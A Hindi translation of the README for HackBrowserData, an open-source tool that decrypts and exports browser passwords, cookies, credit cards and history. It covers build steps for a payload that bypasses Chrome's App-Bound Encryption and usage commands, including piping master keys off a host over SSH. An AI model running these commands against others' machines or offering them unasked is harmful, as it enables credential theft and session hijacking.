
ब्राउज़र डेटा निकालें और डिक्रिप्ट करें, कई डेटा प्रकारों का समर्थन करता है, विभिन्न ऑपरेटिंग सिस्टम (macOS, Windows, Linux) पर चलाने योग्य।
HackBrowserData एक कमांड-लाइन उपकरण है जो ब्राउज़र से ब्राउज़र डेटा (पासवर्ड, इतिहास, कुकीज़, बुकमार्क, क्रेडिट कार्ड, डाउनलोड इतिहास, localStorage, sessionStorage और एक्सटेंशन) को डिक्रिप्ट और निर्यात करने के लिए है। यह विंडोज, मैकओएस और लिनक्स पर सबसे लोकप्रिय क्रोमियम-आधारित ब्राउज़रों और फ़ायरफ़ॉक्स, साथ ही मैकओएस पर सफारी का समर्थन करता है।
यह मशीनों और ऑपरेटिंग सिस्टमों में डेटा को डिक्रिप्ट भी कर सकता है: मूल होस्ट पर मास्टर कुंजियों को निर्यात करें, फिर किसी भी अन्य होस्ट पर ऑफ़लाइन डेटा की एक प्रति डिक्रिप्ट करें — यहां तक कि एक ब्राउज़र के लिए भी जो विश्लेषक होस्ट का OS चला नहीं सकता है (देखें क्रॉस-होस्ट डिक्रिप्शन)।
अस्वीकरण: यह उपकरण केवल सुरक्षा अनुसंधान के लिए है। उपयोगकर्ता इस उपकरण के उपयोग से होने वाली सभी कानूनी और संबंधित देयताओं के लिए जिम्मेदार हैं। मूल लेखक कोई कानूनी जिम्मेदारी नहीं लेता है।
मैकओएस पर, कुछ क्रोमियम-आधारित ब्राउज़रों को डिक्रिप्ट करने के लिए वर्तमान उपयोगकर्ता पासवर्ड की आवश्यकता होती है।
पासवर्ड डिक्रिप्शन macOS 26.4 या बाद के संस्करण पर विफल हो सकता है।
¹ सफारी को फुल डिस्क एक्सेस की आवश्यकता होती है; यदि निष्कर्षण खाली परिणाम लौटाता है तो इसे सिस्टम सेटिंग्स → गोपनीयता और सुरक्षा → फुल डिस्क एक्सेस में सक्षम करें।
² विंडोज पर, Chromium 127+ कुकीज़ (Chrome / Chrome Beta / Edge / Brave / CocCoc) को डिक्रिप्ट करने के लिए
make build-windowsके माध्यम से बनाए गए App-Bound Encryption पेलोड की आवश्यकता होती है — नीचे स्रोत से निर्माण देखें।³ ये ब्राउज़र केवल विंडोज पर उपलब्ध हैं, लेकिन उनका डेटा किसी भी OS पर डिक्रिप्ट करने योग्य है:
archiveके साथ फ़ाइलों को खींचें,dumpkeysके साथ कुंजियों को निर्यात करें, फिरrestoreके साथ macOS या Linux पर डिक्रिप्ट करें — देखें क्रॉस-होस्ट डिक्रिप्शन।
HackBrowserData की स्थापना बहुत सरल है, बस अपने सिस्टम के लिए रिलीज़ डाउनलोड करें और बाइनरी चलाएं।
कुछ स्थितियों में, यह सुरक्षा उपकरण विंडोज डिफेंडर या अन्य एंटीवायरस सॉफ़्टवेयर द्वारा वायरस के रूप में माना जाएगा और इसे निष्पादित नहीं किया जा सकता है। कोड सभी ओपन सोर्स है, आप स्वयं संशोधित और संकलित कर सकते हैं।
Go 1.20+ की आवश्यकता है।```bash
git clone https://github.com/moonD4rk/HackBrowserData
cd HackBrowserData
go build ./cmd/hack-browser-data/
#### क्रॉस-प्लेटफ़ॉर्म बिल्ड```bash
# For Windows (standard build, no Chromium 127+ ABE cookie support)
GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/
# For Linux
GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/
Chrome / Chrome Beta / Edge / Brave / CocCoc 127+ App-Bound Encryption के साथ कुकीज़ को सुरक्षित करते हैं। उन कुकीज़ को डिक्रिप्ट करने के लिए एक छोटे C payload की आवश्यकता होती है — Zig (0.13+) अनुशंसित C टूलचेन है (Makefile zig cc को कॉल करता है)। MinGW-w64 gcc भी स्रोतों को मैन्युअल रूप से बना सकता है यदि आप make payload को बायपास करते हैं।```bash
brew install zig # macOS scoop install zig # Windows (scoop)
make payload
make build-windows
परिणामी `hack-browser-data.exe` में Chromium 127+ पर पूर्ण ABE कुकी डिक्रिप्शन शामिल है।
## उपयोग```
$ hack-browser-data -h
hack-browser-data decrypts and exports browser data from Chromium-based
browsers and Firefox on Windows, macOS, and Linux.
GitHub: https://github.com/moonD4rk/HackBrowserData
Usage:
hack-browser-data [flags]
hack-browser-data [command]
Available Commands:
archive Pack decryption-relevant profile files into a zip for cross-host restore
dump Extract and decrypt browser data (default command)
dumpkeys Export Chromium master keys as JSON for cross-host decryption
help Help about any command
list List detected browsers and profiles
restore Decrypt copied profile data using exported master keys
version Print version information
Flags:
-b, --browser string target browser: all|chrome|firefox|edge|... (default "all")
-c, --category string data categories (comma-separated): all|password,cookie,... (default "all")
-d, --dir string output directory (default "results")
-f, --format string output format: csv|json|cookie-editor (default "json")
-h, --help help for hack-browser-data
--keychain-pw string macOS keychain password
-p, --profile-path string custom profile dir path, get with chrome://version
-v, --verbose enable debug logging
--zip compress output to zip
Use "hack-browser-data [command] --help" for more information about a command.
dump - ब्राउज़र डेटा निकालें और डिक्रिप्ट करें (डिफ़ॉल्ट)hack-browser-data को बिना किसी उप-कमांड के चलाने पर डिफ़ॉल्ट रूप से dump चलता है।
--format cookie-editorकेवल कुकीज़ लिखता है, जो Cookie-Editor ब्राउज़र एक्सटेंशन के आयात फ़ॉर्मेट से मेल खाने वाली JSON सरणी के रूप में होता है; गैर-कुकी श्रेणियाँ छोड़ दी जाती हैं।
किसी विश्लेषक होस्ट पर ब्राउज़र डेटा डिक्रिप्ट करें जो किसी भिन्न मूल होस्ट पर एकत्र किया गया था — जिसमें एक ऐसा ब्राउज़र भी शामिल है जिसका इंजन विश्लेषक का OS स्थापित नहीं कर सकता (उदा. macOS पर Sogou या QQ Browser डेटा डिक्रिप्ट करना)। कोई भी प्लेटफ़ॉर्म-बाध्य चीज़ (DPAPI, macOS Keychain, Chrome App-Bound Encryption) को मूल स्थान छोड़ने की आवश्यकता नहीं है: मास्टर कुंजियाँ एक बार निर्यात की जाती हैं, और फिर डिक्रिप्शन पूरी तरह से ऑफ़लाइन डेटा की प्रतिलिपि से चलता है।
यह कार्यप्रवाह तीन कमांड और दो परिवहनीय आर्टिफैक्ट्स का उपयोग करता है:
hack-browser-data dumpkeys -o keys.json hack-browser-data archive -o browser-data.zip
hack-browser-data restore --keys keys.json --data-zip browser-data.zip
> `keys.json` में सादा टेक्स्ट मास्टर कुंजियाँ होती हैं — इसे एक गुप्त मानें। `dumpkeys -o` इसे `0600` अनुमतियों के साथ लिखता है; इसे डिस्क पर छोड़ने के बजाय एक सुरक्षित चैनल पर स्ट्रीम करना पसंद करें।
#### `dumpkeys` - क्रॉस-होस्ट डिक्रिप्शन के लिए मास्टर कुंजियाँ निर्यात करें
प्रत्येक Chromium स्थापना की मास्टर कुंजियाँ मूल होस्ट पर प्राप्त करता है और उन्हें JSON के रूप में लिखता है (Firefox / Safari में कोई पोर्टेबल कुंजी नहीं है और उन्हें छोड़ दिया जाता है)। डिफ़ॉल्ट रूप से stdout पर आउटपुट देता है ताकि इसे SSH के माध्यम से पाइप किया जा सके।
| फ़्लैग | लघु | डिफ़ॉल्ट | विवरण |
|-----------------|-------|----------|-------------------------------------------------|
| `--browser` | `-b` | `all` | लक्षित ब्राउज़र (all\|chrome\|edge\|...) |
| `--output` | `-o` | *stdout* | आउटपुट फ़ाइल (`0600` अनुमतियों के साथ लिखी गई); छोड़े जाने पर stdout |
| `--keychain-pw` | | | macOS कीचेन पासवर्ड |
#### `archive` - डिक्रिप्शन-संबंधित फ़ाइलों को परिवहन के लिए पैक करें
यह केवल उन फ़ाइलों को संग्रहीत करता है जिनकी restore को वास्तव में आवश्यकता होती है (cookies, login data, history, …), उसी लॉक्ड-फ़ाइल बायपास के माध्यम से जो निष्कर्षण के लिए उपयोग किया जाता है, ताकि Windows पर लाइव SQLite फ़ाइलें सुरक्षित रूप से पढ़ी जा सकें। ज़िप इस प्रकार व्यवस्थित किया जाता है `<browser-key>/<User Data layout>`, इसलिए एक संग्रह कई ब्राउज़रों को ले जा सकता है और restore स्पष्ट रहता है। प्रविष्टि नाम हमेशा फ़ॉरवर्ड-स्लैश होते हैं, इसलिए Windows पर बनाया गया संग्रह macOS / Linux पर restore हो जाता है।
| फ़्लैग | लघु | डिफ़ॉल्ट | विवरण |
|--------------|-------|--------------------|-----------------------------------------|
| `--browser` | `-b` | `all` | लक्षित ब्राउज़र (all\|chrome\|edge\|...) |
| `--category` | `-c` | `all` | डेटा श्रेणियाँ, अल्पविराम से पृथक |
| `--output` | `-o` | `browser-data.zip` | आउटपुट संग्रह पथ |
#### `restore` - निर्यात की गई कुंजियों से कॉपी किए गए डेटा को डिक्रिप्ट करें
प्रत्येक Chromium इंजन को सीधे `keys.json` से पुनर्निर्मित करता है और प्रदत्त डेटा को डिक्रिप्ट करता है — यह कभी भी विश्लेषक की स्थानीय ब्राउज़र तालिका से परामर्श नहीं करता, इसलिए **आप जिन ब्राउज़रों को restore कर सकते हैं वे बिल्कुल आपके `keys.json` में मौजूद vaults हैं**। डेटा की आपूर्ति दो तरीकों में से एक में करें (बिल्कुल एक आवश्यक है):
- `--data-zip` — `archive` द्वारा उत्पन्न एक ज़िप; एक अस्थायी निर्देशिका में निकाला जाता है और बाद में हटा दिया जाता है।
- `--data-dir` — एक निर्देशिका। या तो `archive` लेआउट (`<browser-key>/...`, एक साथ कई ब्राउज़र), या एक ब्राउज़र की हाथ से कॉपी की गई `User Data` रूट, जो केवल एक ब्राउज़र के लिए स्पष्ट है — इसलिए इसे `-b` के साथ जोड़ें।
`-b` डंप के vaults पर एक **वैकल्पिक फ़िल्टर** है, कोई आवश्यक चयनकर्ता नहीं।
| फ़्लैग | लघु | डिफ़ॉल्ट | विवरण |
|--------------|-------|------------|------------------------------------------------------------|
| `--keys` | | *आवश्यक* | `dumpkeys` से कुंजी फ़ाइल (stdin के लिए `-` का उपयोग करें) |
| `--data-zip` | | | `archive` से ज़िप (`--data-dir` के साथ परस्पर अनन्य) |
| `--data-dir` | | | कॉपी किया गया डेटा निर्देशिका (`--data-zip` के साथ परस्पर अनन्य) |
| `--browser` | `-b` | | केवल इस ब्राउज़र को पुनर्स्थापित करें; `--keys` में किसी vault से मेल खाना चाहिए |
| `--category` | `-c` | `all` | डेटा श्रेणियाँ, अल्पविराम से पृथक |
| `--format` | `-f` | `json` | आउटपुट प्रारूप (csv\|json\|cookie-editor) |
| `--dir` | `-d` | `results` | आउटपुट निर्देशिका |
| `--zip` | | `false` | आउटपुट को ज़िप में संपीडित करें |
#### क्रॉस-होस्ट उदाहरण```bash
# Stream keys over SSH (no keys.json on disk), data copied separately
ssh origin "hack-browser-data dumpkeys" | \
hack-browser-data restore --keys - --data-zip browser-data.zip
# Restore one browser from a hand-copied User Data folder (no archive)
hack-browser-data restore --keys keys.json --data-dir ./chrome-userdata -b chrome
list - पता लगाए गए ब्राउज़र और प्रोफाइल को सूचीबद्ध करें| Flag | Default | Description |
|---|---|---|
--detail | false | प्रति श्रेणी प्रविष्टि गणना दिखाएं |
version - संस्करण जानकारी प्रिंट करें```bashhack-browser-data version
### वैश्विक ध्वज
| Flag | Short | Description |
|-------------|-------|----------------------|
| `--verbose` | `-v` | डीबग लॉगिंग सक्षम करें |
### उदाहरण```bash
# Extract all data from all browsers (default)
hack-browser-data
# Extract specific browser and categories
hack-browser-data dump -b chrome -c password,cookie
# Export in CSV format to a custom directory (JSON is the default)
hack-browser-data dump -b chrome -f csv -d output
# Export cookies in CookieEditor format
hack-browser-data dump -f cookie-editor
# Compress output to zip
hack-browser-data dump --zip
# List detected browsers and profiles
hack-browser-data list
# List with per-category entry counts
hack-browser-data list --detail
# Use custom profile path
hack-browser-data dump -b chrome -p "/path/to/User Data/Default"
हम समुदाय द्वारा किए गए किसी भी योगदान का स्वागत और सराहना करते हैं (GitHub मुद्दे/पुल अनुरोध, ईमेल फ़ीडबैक, आदि)।
कृपया योगदान देने से पहले योगदान गाइड देखें।
HackBrowserData 404Team StarLink-Galaxy का एक हिस्सा है, यदि आपके पास HackBrowserData के बारे में कोई प्रश्न हैं या संवाद करने के लिए एक साथी खोजना चाहते हैं, तो कृपया Starlink समूह देखें।

HackBrowserData को GoLand IDE के साथ JetBrains s.r.o. द्वारा प्रदान किए गए मुफ्त JetBrains ओपन सोर्स लाइसेंस के तहत विकसित किया गया था, इसलिए मैं यहां अपना धन्यवाद व्यक्त करना चाहता हूं।
| श्रेणी | क्रोमियम-आधारित | फ़ायरफ़ॉक्स | सफारी |
|---|
| पासवर्ड | ✅ | ✅ | ✅ |
| कुकी | ✅ | ✅ | ✅ |
| बुकमार्क | ✅ | ✅ | ✅ |
| इतिहास | ✅ | ✅ | ✅ |
| डाउनलोड | ✅ | ✅ | ✅ |
| क्रेडिट कार्ड | ✅ | - | - |
| एक्सटेंशन | ✅ | ✅ | ✅ |
| LocalStorage | ✅ | ✅ | ✅ |
| SessionStorage | ✅ | - | - |
| ब्राउज़र | विंडोज | मैकओएस | लिनक्स |
|---|
| Chrome | ✅² | ✅ | ✅ |
| Chrome Beta | ✅² | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ |
| Edge | ✅² | ✅ | ✅ |
| Brave | ✅² | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ |
| OperaGX | ✅ | ✅ | - |
| Vivaldi | ✅ | ✅ | ✅ |
| Yandex | ✅ | ✅ | - |
| CocCoc | ✅² | ✅ | - |
| Arc | ✅ | ✅ | - |
| DuckDuckGo³ | ✅ | - | - |
| QQ³ | ✅ | - | - |
| 360 ChromeX³ | ✅ | - | - |
| 360 Chrome³ | ✅ | - | - |
| DC Browser³ | ✅ | - | - |
| Sogou Explorer³ | ✅ | - | - |
| Firefox | ✅ | ✅ | ✅ |
| Safari¹ | - | ✅ | - |
| फ़्लैग | शॉर्ट | डिफ़ॉल्ट | विवरण |
|---|
--browser | -b | all | लक्षित ब्राउज़र (all|chrome|firefox|edge|...) |
--category | -c | all | डेटा श्रेणियाँ, अल्पविराम से अलग की गईं (all|password|cookie|bookmark|history|download|creditcard|extension|localstorage|sessionstorage) |
--format | -f | json | आउटपुट फ़ॉर्मेट (csv|json|cookie-editor) |
--dir | -d | results | आउटपुट निर्देशिका |
--profile-path | -p | कस्टम प्रोफ़ाइल निर्देशिका पथ, chrome://version से प्राप्त करें | |
--keychain-pw | macOS कीचेन पासवर्ड | ||
--zip | false | आउटपुट को ज़िप में संपीड़ित करें |
| चरण | होस्ट | कमांड | उत्पन्न करता है |
|---|
| 1 | मूल | dumpkeys | keys.json — पोर्टेबल मास्टर कुंजियाँ |
| 2 | मूल | archive | browser-data.zip — केवल डिक्रिप्ट करने के लिए आवश्यक फ़ाइलें |
| 3 | विश्लेषक | restore | डिक्रिप्टेड आउटपुट (csv / json / cookie-editor) |
Roger |
Aquilao Official |
uinfziuna8n |
Cyrus |
stevenlele |
Carlo Mandelli |
slimwang |
zznQ |
YuXJ |
mirefly |
LC |
zhe6652 |
guoguangwu |
beichen |
Santiago Ramirez |
Ciprian Conache |
a-urth |
Amir. |